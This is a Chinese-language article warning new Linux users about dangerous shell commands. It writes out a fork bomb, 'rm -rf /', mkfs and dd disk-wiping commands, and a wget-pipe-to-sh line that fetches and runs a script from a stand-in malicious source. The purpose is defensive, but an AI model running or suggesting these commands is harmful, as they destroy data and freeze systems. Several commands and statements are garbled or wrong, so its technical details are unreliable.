Linux shell/terminal 指令非常強大,即使一個簡單的指令就可能導致資料夾、檔案或路徑資料夾等被刪除。
在某些情況下,Linux 甚至不會詢問你而直接執行命令,導致你遺失各種資料資訊。
一般來說在 Web 上推薦新的 Linux 使用者執行這些指令,當然,也有人哪些寫過這程式碼的人不這麼想,因為這玩意你一寫下去就不是玩笑了。
這裡我收集了一些對系統有危害的 Linux 代碼,並幫助你避免他們。請記住:這些程式碼非常危險,甚至可以經過修改,變得更有危害性。
還有一些事情要注意:有些指令只在 Ubuntu 中有 sudo 前綴時是有危害的。其他發行版本的 Linux,則是在作為根目錄命令時會有危害。
1. Linux Fork Bomb Command
:(){ :: & };: Fork Bomb 聞名,且是拒絕服務攻擊的系統。 :(){ :: & };: 是一個 bash 函數。只要被執行,他會不斷重複,直到系統被凍結。
你只能重新啟動系統才能解決這個問題。所以當你在 Linux 介面執行這個指令時一定要注意。
2. Mv Folder/Dev/Null Command
mv folder/dev/null 也是一個危險的指令。 Dev/null 或 null device 是一個刪除所有寫在這個裝置文件上資料的裝置文件,但是,該操作提示卻是寫入作業執行成功。這就是我們常說的 bit bucked 或 black hole。
3. Rm -Rf Command
rm -rf指令在 Linux 系統中可快速移除資料夾及其內容物。如果,你不知道如何正確使用它,你就只是哭了。
列下m-rf 指令最常見的組合與選擇:
rm command :刪除 Linux 系統的檔案
rm 夾的內容
rm -d command :刪除空目錄,如果非空白目錄則不會執行該操作
rm -rf/ command:強制刪除根目錄中的所有內容和子資料夾(包括寫入保護檔案)命令。
rm -rf* command :強制刪除目前目錄中的所有內容(目前工作目錄)和字資料夾
rm -rf. command:強制刪除目前資料夾目錄/子目錄中的所有內容 。同 rm -r.[^.]*
The rm -r.[^.]* command :刪除檔案及資料夾,並有刪除提示
如果你不知 mkfs 的作用,那麼它也是一個危險的命令,mkfs 之後寫的任何命令都將會被一個空白的 linux 檔案系統格式化、替代。
在下方列出需要管理員權限,格式化硬碟的指令:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.cramfs也可以和上面的程式碼做同樣的事情,不過不需要管理來源權限。
5. Tar Bomb
tar 以將多個檔案放入 .tar 格式放入一個檔案中(檔案檔案)。 Tape Archive (Tar) bomb 可以由他創造。
當為壓縮時,就是這個存檔檔案產生數以萬計的相似名稱檔案出現在目前目錄中而不是新目錄。
當收到 tar 文件,並定期建立新的保護目錄,然後在解壓縮前將接受的 tar 檔案放到這個目錄中,你可以避免成為 tar bomb 的受害者。
6. Dd Command
Dd 指令用於複製&改變硬碟分區。如果,你用錯地方了,那麼也很危險。
下方列出 dd 指令:
dd if=/dev/hda of=/dev/hdb
dd if =something of=/dev/sda
下面這個指令會將整個主硬碟清除:dd if=/dev/zero of=/dev/had
7. Shell Code
7. Shell 坑,給你一個 shell 腳本文件,讓你去下載並執行它。該腳本可能會包含一些惡意的或危險的程式碼。命令形式可能會是這樣:wget http://some_malicious_source -O- sh。 wget 將會在 sh 狹隘腳本 時下載腳本。
8. Malicious Source Code
也許有人會給你原始碼讓你編譯他。程式碼可能是正常程式碼,不過,有一些惡意程式碼偽裝在大型原始碼中,如果是這樣,你的系統就中槍了。如何避免?僅接受並編譯可信賴來源的原始碼。
9. Decompression Bomb
你已經收到一個壓縮文件,你被要求提取這個看起來很小的文件,可能小到 KB。事實上,該小尺寸的壓縮檔案包含高度壓縮資料。
只要檔案解壓縮,上百 GB 資料會被擷取,這時候,過大的資料填滿硬碟導致宕機,幾率就很大了。如何避免?還是那句老話,別手賤,什麼檔案都去接收,請接收可信任來源檔案。